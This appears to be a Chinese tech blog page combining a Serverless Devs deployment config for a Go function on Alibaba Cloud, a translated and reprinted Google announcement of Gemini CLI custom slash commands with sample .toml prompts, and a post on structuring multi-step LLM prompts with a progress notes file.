#   关于如何做CICD等问题，可以参考：https://www.serverless-devs.com/serverless-devs/cicd
#   关于如何进行环境划分等问题，可以参考：https://www.serverless-devs.com/serverless-devs/extend
#   更多函数计算案例，可参考：https://github.com/devsapp/awesome/
#   有问题快来钉钉群问一下吧：33947367
# ------------------------------------
edition: 1.0.0
name: web-framework-app
# access 是当前应用所需要的密钥信息配置：
# 密钥配置可以参考：https://www.serverless-devs.com/serverless-devs/command/config
# 密钥使用顺序可以参考：https://www.serverless-devs.com/serverless-devs/tool#密钥使用顺序与规范
access: 'undefined'

vars: # 全局变量
  region: 'cn-hangzhou'
  service:
    name: 'demo-api'
    description: 'Serverless Devs Web Framework Service'

services:
  framework: # 业务名称/模块名称
    # 如果只想针对 framework 下面的业务进行相关操作，可以在命令行中加上 framework，例如：
    # 只对framework进行构建：s framework build
    # 如果不带有 framework ，而是直接执行 s build，工具则会对当前Yaml下，所有和 framework 平级的业务模块（如有其他平级的模块，例如下面注释的next-function），按照一定顺序进行 build 操作
    component: fc # 组件名称，Serverless Devs 工具本身类似于一种游戏机，不具备具体的业务能力，组件类似于游戏卡，用户通过向游戏机中插入不同的游戏卡实现不同的功能，即通过使用不同的组件实现不同的具体业务能力
    actions: # 自定义执行逻辑，关于actions 的使用，可以参考：https://www.serverless-devs.com/serverless-devs/yaml#行为描述
      pre-deploy: # 在deploy之前运行
        - run: |
            rm -rf /usr/local/go
            wget https://golang.google.cn/dl/go1.23.12.linux-amd64.tar.gz
            sudo tar -C /usr/local -xzf go1.23.12.linux-amd64.tar.gz
            export PATH=/usr/local/go/bin:$PATH
            go version
            go mod tidy
            GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o main main.go
          path: ./code
    props: # 组件的属性值
      region: ${vars.region} # 关于变量的使用方法，可以参考：https://www.serverless-devs.com/serverless-devs/yaml#变量赋值
      service: ${vars.service}
      function:
        name: 'demo-function'
        description: 'Serverless Devs Web Framework Function'
        codeUri: ./code
        runtime: custom.debian10
        memorySize: 1024
        timeout: 30
        instanceConcurrency: 100
        caPort: 8080
        customRuntimeConfig:
          command:
            - '/code/main'
      triggers:
        - name: httpTrigger
          type: http
          config:
            authType: anonymous
            methods:
              - GET
              - POST
              - PUT
              - DELETE
              - HEAD
              - OPTIONS
      customDomains:
        - domainName: auto
          protocol: HTTP
          routeConfigs:
            - path: /*

参考

阿里云,FC,https://help.aliyun.com/zh/functioncompute/fc-2-0/user-guide/overview-10
go install doc,https://golang.google.cn/doc/install
go,release list, https://golang.google.cn/dl/

AI|Gemini CLI,自定义斜杠命令(译)

2025-09-09T16:00:00.000Z

源自 | 2025年7月31日 Jack Wotherspoon, 开发者倡导者 Abhi Patel, 软件工程师

今天，我们宣布在 Gemini CLI 中支持自定义斜杠命令！这个备受期待的功能可让您定义可重用的提示，以简化与 Gemini CLI 的交互，并有助于提高跨工作流程的效率。斜杠命令可以在本地 .toml 文件中定义，也可以通过模型上下文协议 (MCP) 提示来定义。准备好利用斜杠命令的全新功能来改变您利用 Gemini CLI 的方式！

要使用斜杠命令，请确保您更新到最新版本的 Gemini CLI。

更新 npx：

npx @google/gemini-cli

更新 npm：

npm install -g @google/gemini-cli@latest

强大的、可扩展的 .toml 文件基础

自定义斜杠命令的基础植根于 .toml 文件。

.toml 文件提供了一个强大且结构化的基础，可在此基础上为复杂命令构建广泛的支持。为了帮助支持广泛的用户，我们将所需的密钥减至最少（只需 prompt）。我们还支持易于使用的参数 {{args}} 和 shell 命令执行 !{...}，可直接在提示中使用。

以下是一个示例 .toml 文件，可使用 Gemini CLI 中的 /review 调用以审查 GitHub PR。请注意，文件名定义了命令名称，并且区分大小写。有关自定义斜杠命令的更多信息，请参阅 Gemini CLI 文档的自定义命令部分。

description="Reviews a pull request based on issue number."
prompt = """
Please provide a detailed pull request review on GitHub issue {{args}}.
Follow these steps:
1. Use `gh pr view {{args}}` to pull the information of the PR.
2. Use `gh pr diff {{args}}` to view the diff of the PR.
3. Understand the intent of the PR using the PR description.
4. If PR description is not detailed enough to understand the intent,
   make sure to note it in your review.
5. Make sure the PR title follows Conventional Commits, here are some recent
   commits to the repo as examples: !{git log --pretty=format:%s -n 10}
6. Search the codebase if required.
7. Write a concise review of the PR, keeping in mind to encourage high
   quality and best practices.
8. Use `gh pr comment {{args}} --body {{review}}` to post the review.
Remember to use the GitHub CLI (`gh`) with the Shell tool for all
GitHub-related tasks.
"""

命名空间

命令的名称由其相对于 commands 目录的文件路径确定。子目录用于创建命名空间命令，路径分隔符（/ 或 \）将转换为冒号 (:)。

/.gemini/commands/test.toml 处的文件将成为 /test 命令。
/.gemini/commands/git/commit.toml 处的文件将成为命名空间命令 /git:commit。
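
The naming rule can be illustrated with a short Go function that maps a file path, given relative to the commands directory, to the command it would produce. This is a sketch of the rule as described here, not Gemini CLI's own code, and the function name is hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// commandName derives the slash command for a .toml file path given relative
// to the commands directory, for example "git/commit.toml".
func commandName(relPath string) string {
	name := strings.TrimSuffix(relPath, ".toml")
	// Both separator styles become the namespace separator.
	name = strings.NewReplacer("/", ":", `\`, ":").Replace(name)
	return "/" + name
}

func main() {
	fmt.Println(commandName("test.toml"))
	fmt.Println(commandName("git/commit.toml"))
}
```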

这允许将相关命令分组到单个命名空间下。

构建斜杠命令

接下来的几个部分将向您展示如何为 Gemini CLI 构建斜杠命令。

1 - 创建命令文件

首先，在 ~/.gemini/commands/ 目录中创建一个名为 plan.toml 的文件。这样做会让您创建一个 /plan 命令，告诉 Gemini CLI 仅通过提供分步计划来规划更改，而不开始实施。这种方法可让您在实施前提供反馈并迭代计划。

自定义斜杠命令可以通过在指定目录中定义 .toml 文件来限定于单个用户或项目。

用户范围的命令可用于用户的所有 Gemini CLI 项目，并存储在 ~/.gemini/commands/ 中（注意 ~）。
项目范围的命令仅可从给定项目中的会话中获得，并存储在 .gemini/commands/ 中。

提示：要简化项目工作流程，请将这些文件签入 Git 存储库！

mkdir -p ~/.gemini/commands
touch ~/.gemini/commands/plan.toml

2 - 添加命令定义

打开 plan.toml 并添加以下内容：

# ~/.gemini/commands/plan.toml
description="Investigates and creates a strategic plan to accomplish a goal."
prompt = """
Your primary role is that of a strategist, not an implementer.
Your task is to stop, think deeply, and devise a comprehensive strategic plan.
You MUST NOT write, modify, or execute any code. Your sole focus is on the plan.
Use your available "read" and "search" tools to research and gather information.
Present your strategic plan in markdown. It should be the direct and only output.
1.  **Understanding the Goal:** Re-state the objective to confirm your understanding.
2.  **Investigation & Analysis:** Describe the investigative steps you will take.
3.  **Proposed Strategic Approach:** Outline the high-level strategy.
4.  **Verification Strategy:** Explain how the success of the plan will be verified.
5.  **Anticipated Challenges & Considerations:** Based on your analysis, list potential issues.
Your final output should be ONLY this strategic plan.
"""

3 - 使用命令

现在您可以在 Gemini CLI 中使用此命令：

/plan How can I make the project more performant?

Gemini 将规划出更改并输出详细的分步执行计划！

与 MCP 提示的丰富集成

Gemini CLI 现在通过支持 MCP 提示作为斜杠命令，提供了与 MCP 更集成的体验！MCP 为服务器向客户端公开提示模板提供了一种标准化的方法。Gemini CLI 利用这一点来公开已配置 MCP 服务器的可用提示，并使这些提示可用作斜杠命令。

MCP 提示的名称和描述将用作斜杠命令的名称和描述。还支持 MCP 提示参数，并通过使用 /mycommand --="" 或按位置 /mycommand 在斜杠命令中加以利用。

以下是使用 FastMCP Python 服务器的 /research 命令示例：

轻松入门

还在等什么？立即使用 Gemini CLI 升级您的终端体验，并试用自定义斜杠命令来简化您的工作流程。要了解更多信息，请查看 Gemini CLI 的自定义命令文档。

原文

https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

AI|Gemini CLI,Custom slash commands(转载)

2025-09-09T16:00:00.000Z

July 31, 2025

Jack Wotherspoon, Developer Advocate

Abhi Patel, Software Engineer

Today, we’re announcing support for custom slash commands in Gemini CLI! This highly requested feature lets you define reusable prompts for streamlining interactions with Gemini CLI and helps improve efficiency across workflows. Slash commands can be defined in local .toml files or through Model Context Protocol (MCP) prompts. Get ready to transform how you leverage Gemini CLI with the new power of slash commands!

To use slash commands, make sure that you update to the latest version of Gemini CLI.

Update npx:

npx @google/gemini-cli

Update npm:

npm install -g @google/gemini-cli@latest

Powerful and extensible foundation with .toml files

The foundation of custom slash commands is rooted in .toml files.

The .toml file provides a powerful and structured base on which to build extensive support for complex commands. To help support a wide range of users, we made the required keys minimal (just prompt). And we support easy-to-use args with {{args}} and shell command execution !{...} directly into the prompt.

Here is an example .toml file that is invoked using /review from Gemini CLI to review a GitHub PR. Notice that the file name defines the command name and it’s case sensitive. For more information about custom slash commands, see the Custom Commands section of the Gemini CLI documentation.

description="Reviews a pull request based on issue number."
prompt = """
Please provide a detailed pull request review on GitHub issue {{args}}.
Follow these steps:
1. Use `gh pr view {{args}}` to pull the information of the PR.
2. Use `gh pr diff {{args}}` to view the diff of the PR.
3. Understand the intent of the PR using the PR description.
4. If PR description is not detailed enough to understand the intent,
   make sure to note it in your review.
5. Make sure the PR title follows Conventional Commits, here are some recent
   commits to the repo as examples: !{git log --pretty=format:%s -n 10}
6. Search the codebase if required.
7. Write a concise review of the PR, keeping in mind to encourage high
   quality and best practices.
8. Use `gh pr comment {{args}} --body {{review}}` to post the review.
Remember to use the GitHub CLI (`gh`) with the Shell tool for all
GitHub-related tasks.
"""

Namespacing

The name of a command is determined by its file path relative to the commands directory. Sub-directories are used to create namespaced commands, with the path separator (/ or \) being converted to a colon (:).

A file at /.gemini/commands/test.toml becomes the command /test.
A file at /.gemini/commands/git/commit.toml becomes the namespaced command /git:commit.

This allows grouping related commands under a single namespace.

Building a slash command

The next few sections show you how to build a slash command for Gemini CLI.

1 - Create the command file

First, create a file named plan.toml inside the ~/.gemini/commands/ directory. Doing so will let you create a /plan command to tell Gemini CLI to only plan the changes by providing a step-by-step plan and to not start on implementation. This approach will let you provide feedback and iterate on the plan before implementation.

Custom slash commands can be scoped to an individual user or project by defining the .toml files in designated directories.

User-scoped commands are available across all Gemini CLI projects for a user and are stored in ~/.gemini/commands/ (note the ~).
Project-scoped commands are only available from sessions within a given project and are stored in .gemini/commands/.

Hint: To streamline project workflows, check these into Git repositories!

mkdir -p ~/.gemini/commands
touch ~/.gemini/commands/plan.toml

2 - Add the command definition

Open plan.toml and add the following content:

# ~/.gemini/commands/plan.toml
description="Investigates and creates a strategic plan to accomplish a goal."
prompt = """
Your primary role is that of a strategist, not an implementer.
Your task is to stop, think deeply, and devise a comprehensive strategic plan.
You MUST NOT write, modify, or execute any code. Your sole focus is on the plan.
Use your available "read" and "search" tools to research and gather information.
Present your strategic plan in markdown. It should be the direct and only output.
1.  **Understanding the Goal:** Re-state the objective to confirm your understanding.
2.  **Investigation & Analysis:** Describe the investigative steps you will take.
3.  **Proposed Strategic Approach:** Outline the high-level strategy.
4.  **Verification Strategy:** Explain how the success of the plan will be verified.
5.  **Anticipated Challenges & Considerations:** Based on your analysis, list potential issues.
Your final output should be ONLY this strategic plan.
"""

3 - Use the command

Now you can use this command within Gemini CLI:

/plan How can I make the project more performant?

Gemini will plan out the changes and output a detailed step-by-step execution plan!

Enriched integration with MCP Prompts

Gemini CLI now offers a more integrated experience with MCP by supporting MCP Prompts as slash commands! MCP provides a standardized way for servers to expose prompt templates to clients. Gemini CLI utilizes this to expose available prompts for configured MCP servers and make the prompts available as slash commands.

The name and description of the MCP prompt is used as the slash command name and description. MCP prompt arguments are also supported and leveraged in slash commands by using /mycommand --="" or positionally /mycommand .

The following is an example /research command that uses FastMCP Python server:

Easy to get started

So what are you waiting for? Upgrade your terminal experience with Gemini CLI today and try out custom slash commands to streamline your workflows. To learn more, check out the Custom Commands documentation for the Gemini CLI.

原文

https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

AI|如何用记笔记的模式写提示词(prompt)让LLM能完成复杂任务

2025-09-09T16:00:00.000Z

以下介绍一种减少LLM在执行复杂任务过程中产生幻觉的技巧,让ai更好完成任务,示例需结合gemini-cli使用,在其他工具中使用方法类似

提示词

指定ai能使用的工具,定义好输入/输出格式,拆分步骤,设定好笔记格式,让ai分步执行,并在每步完成后记到笔记文件中直到完成任务.

如下是一个翻译网页提示词:

输入：
文章URL：https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

输出：
1. 格式化后的原文article.md
2. 中英文双语版article-en-cn.md
3. 中文版article-cn.md
4. 文章中所有的图片资源

每完成一步，都必须更新progress.md

步骤0: 生成笔记
- 仿照例子和当前任务生成笔记 progress.md

步骤1: 访问网站
- 访问上文输入中网址
- 必须使用 "lynx -dump -image_links URL"命令访问网站
- 网站内容保存在raw.txt中

步骤2：下载图片
- 从raw.txt中提取文章相关图片链接
- 把图片链接写入 progress.md
- 逐一下载到 resources/ 文件夹
- 每下载完成一个图片，必须更新图片下载进度
- 你必须使用curl命令进行下载

步骤3：改写成markdown
- 把raw.txt改写成markdown格式
- 保存在article.md中
- 将article.md中的图片链接指向 resources/ 文件夹

步骤4：翻译成中英文
- 把article.md翻译成中英文对照
- 保存在article-en-cn.md中

步骤5：翻译成中文
- 提取article-en-cn.md中的中文
- 保存在article-cn.md中

----
progress.md 笔记格式

## 任务
[x] xxxxx
[ ] yyyyy
[ ] zzzzz
...

## 图片下载进度
[x] https://xxxx/yyy.png
[ ] https://foo/bar.png
...

## 当前任务
正在下载https://foo/bar.png

封装为gemini-cli命令

将提示词写到文件中 ~/.gemini/commands/translate.toml

prompt = """
输入：
文章URL：{{args}}

输出：
1. 格式化后的原文article.md
2. 中英文双语版article-en-cn.md
3. 中文版article-cn.md
4. 文章中所有的图片资源

每完成一步，都必须更新progress.md

步骤0: 生成笔记
- 仿照例子和当前任务生成笔记 progress.md

步骤1: 访问网站
- 访问上文输入中网址
- 必须使用 "lynx -dump -image_links URL"命令访问网站
- 网站内容保存在raw.txt中

步骤2：下载图片
- 从raw.txt中提取文章相关图片链接
- 把图片链接写入 progress.md
- 逐一下载到 resources/ 文件夹
- 每下载完成一个图片，必须更新图片下载进度
- 你必须使用curl命令进行下载

步骤3：改写成markdown
- 把raw.txt改写成markdown格式
- 保存在article.md中
- 将article.md中的图片链接指向 resources/ 文件夹

步骤4：翻译成中英文
- 把article.md翻译成中英文对照
- 保存在article-en-cn.md中

步骤5：翻译成中文
- 提取article-en-cn.md中的中文
- 保存在article-cn.md中

----
progress.md 笔记格式

## 任务
[x] xxxxx
[ ] yyyyy
[ ] zzzzz
...

## 图片下载进度
[x] https://xxxx/yyy.png
[ ] https://foo/bar.png
...

## 当前任务
正在下载https://foo/bar.png

"""

即可这样使用

gemini

/translate https://cloud.google.com/blog/topics/developers-practitioners/gemini-cli-custom-slash-commands

参考

video

prompt


Tip 5: Use Checkpointing and `/restore` as an Undo Button

Tip 7: Reference Files and Images with `@` for Explicit Context

Tip 16: Passthrough Shell Commands with `!` (Talk to Your Terminal)

Tip 19: Customize the `$PATH` (and Tool Availability) for Stability

Tip 21: Use `/copy` for Quick Clipboard Copy

Tip 22: Master `Ctrl+C` for Shell Mode and Exiting

Tip 23: Customize Gemini CLI with `settings.json`

Tip 25: Automate Repo Tasks with `Gemini CLI GitHub Action`

Tip 28: Extend Gemini CLI with `Extensions`